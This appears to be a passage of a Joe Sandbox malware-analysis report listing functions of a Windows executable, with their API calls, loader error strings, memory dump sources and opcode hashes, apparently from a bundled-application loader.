                                                                                                                                                                                                            Function 00007FF7ACE82030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                            • Opcode ID: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction ID: 0b7826430d0cf7a90934adf39a70d1d8bb12a0e76d323ea0f73b036c269b5f03
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5a3bd79b12c7c571d23b6b5ebdfb181c7e65479c9c05912b09222cce72f5b00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51F536609BA186D634AF26E4181BAF7A1FB98B62F004121EBCF53694DF3CD045DB20
                                                                                                                                                                                                            Function 00007FF7ACE90158 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                            • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                            • Instruction ID: da6b3b31c4d8d90aab4c54c2e049d9ab2bfaa8acaa5cc2628c37f0eb8c7c78fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2712E672E0E183A6FB20BA94E0542BDF6A1FB48750FC54075F689666E4CF3CE5808B60
                                                                                                                                                                                                            Function 00007FF7ACE812B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                            • Opcode ID: 4c00a865390b6ee80d28535fbbf127f72415018508e978614aee0788645671fc
                                                                                                                                                                                                            • Instruction ID: 593627fda9dab8f558f792bd231727e4e0d85f49fb528d0963f37c8082c8414b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c00a865390b6ee80d28535fbbf127f72415018508e978614aee0788645671fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A418131A0E7C2A6EA24FB11E5006AAF3A0EF44795FC64431DE4D67B65EE3CE442C760
                                                                                                                                                                                                            Function 00007FF7ACE8DB70 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                            • Opcode ID: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction ID: 5d1751316ef1f5eab15ddae75398b5635df98f9a966358a2baaa60517066b618
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905927d9e3da027d40e91907a7f1dd58b6d09944997845db9437df3d999e9f33
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE1D732A0D78296EB20AF65D6413ADB7E0FB45B89F410135EE4DABB65CF38E580C710
                                                                                                                                                                                                            Function 00007FF7ACE9DCE8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000022254556BC8,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE64
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000,?,00007FF7ACE9E082,?,?,0000022254556BC8,00007FF7ACE9A153,?,?,?,00007FF7ACE9A04A,?,?,?,00007FF7ACE953A2), ref: 00007FF7ACE9DE70
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                            • Opcode ID: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction ID: ef2aa6d2e5a971071294e3ceaeec42b4989394e42f5454e2013f99957e563748
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f9ea5ddd66982662272f3b60427da02763780b89cc10366f1f57cf1354b879c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4413671B1F61271FA15AB169810575E792BF04BA0F8A4235ED0DBB7B8EF3CE5058320
                                                                                                                                                                                                            Function 00007FF7ACE87570 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8760F
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE8765F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                                            • Opcode ID: 4c75aad5540be6d6cf442b20722a3a637b86b79be2c0eb90bd337d9e394b857c
                                                                                                                                                                                                            • Instruction ID: e2ec6177175a16ff15230b6a86fbe89e2ea7d453b012df15b2b9d915e3ad3769
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c75aad5540be6d6cf442b20722a3a637b86b79be2c0eb90bd337d9e394b857c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4419032A0EB82D6E720EF15B44016AF7A4FB84791F9A4135EA8D57BA8DF3CD052D710
                                                                                                                                                                                                            Function 00007FF7ACE87AB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87AF1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87B65
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                                            • Opcode ID: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction ID: 108a2f5d446a2246b8831e8ed74b1f0d2a16c46b9871131daed29ae2ceefcc1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B218031B0EB82A9EA10EF25A940079F3A2FB54BD1F994135DA4D637B5EF7CE4518310
                                                                                                                                                                                                            Function 00007FF7ACE99194 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                                                                            • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                            • Instruction ID: 6fd12ca7f0a0904bece7afa7476e9d33009f3bc6c9a924806eb8700c92d6cb9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6129072A0E243A6FB20BE15E0546BAF691FB40750FCA4175F68D566E4DF3CED808B21
                                                                                                                                                                                                            Function 00007FF7ACE87BA0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 99COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 626452242-876015163
                                                                                                                                                                                                            • Opcode ID: 0d5216bbebe1e4d5e4fda212484cc9b67e4195dbf35dd583a6e8b35915cdcea1
                                                                                                                                                                                                            • Instruction ID: 3c2c21d525b923d4fa470110272f6166fdeacbee437a8c51b803d92322e640c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d5216bbebe1e4d5e4fda212484cc9b67e4195dbf35dd583a6e8b35915cdcea1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A41B032B0EA82E6E620EF15A44017AF6A5FB48791F9A4135EE4D67BB4DF3CD051C720
                                                                                                                                                                                                            Function 00007FF7ACE8CE28 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEAD
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEBB
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEE5
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF2B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF37
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            • Opcode ID: 5875a968ec1c8163f4728790c5c34772c02e6e55674a02490018482c9d800bcd
                                                                                                                                                                                                            • Instruction ID: 9bd18943ff91ac958b9241b69cb3dd60a6f2910d3ecab83f49810efe2ddf4b71
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5875a968ec1c8163f4728790c5c34772c02e6e55674a02490018482c9d800bcd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC31C132A1F682B5FE51AF02A900575B2D4BF09BA1F9B4535ED1D6A3A0EF3CE4458720
                                                                                                                                                                                                            Function 00007FF7ACE86460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7ACE867AF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7ACE864BF
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7ACE864D3
                                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7ACE8651A
                                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7ACE86496
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                                            • Opcode ID: b60e1185c9f9ee707b49e7ed4e3a4a995e0c101ca8882adb9a2ed2a45595f786
                                                                                                                                                                                                            • Instruction ID: 099da92983183ff0bed5e8c1ee8c70a1594bd78d14001c93cc879eef496f46f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b60e1185c9f9ee707b49e7ed4e3a4a995e0c101ca8882adb9a2ed2a45595f786
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531CC35B1E7C260FE20F721D6552B9E2516F94782FC50431DA4E727F9EE2CE1048720
                                                                                                                                                                                                            Function 00007FF7ACE879A0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE87A60
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                                            • Opcode ID: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction ID: 59ce6404e3286414f3de503832cd4f8fe93af2fc6babc8c68ea61fcecd10c73e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2219132B0DA82A5EB50EB19F50007AE3A1EB987C5F9D4171DB4CA3BB9EF2DD5418710
                                                                                                                                                                                                            Function 00007FF7ACE9A550 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
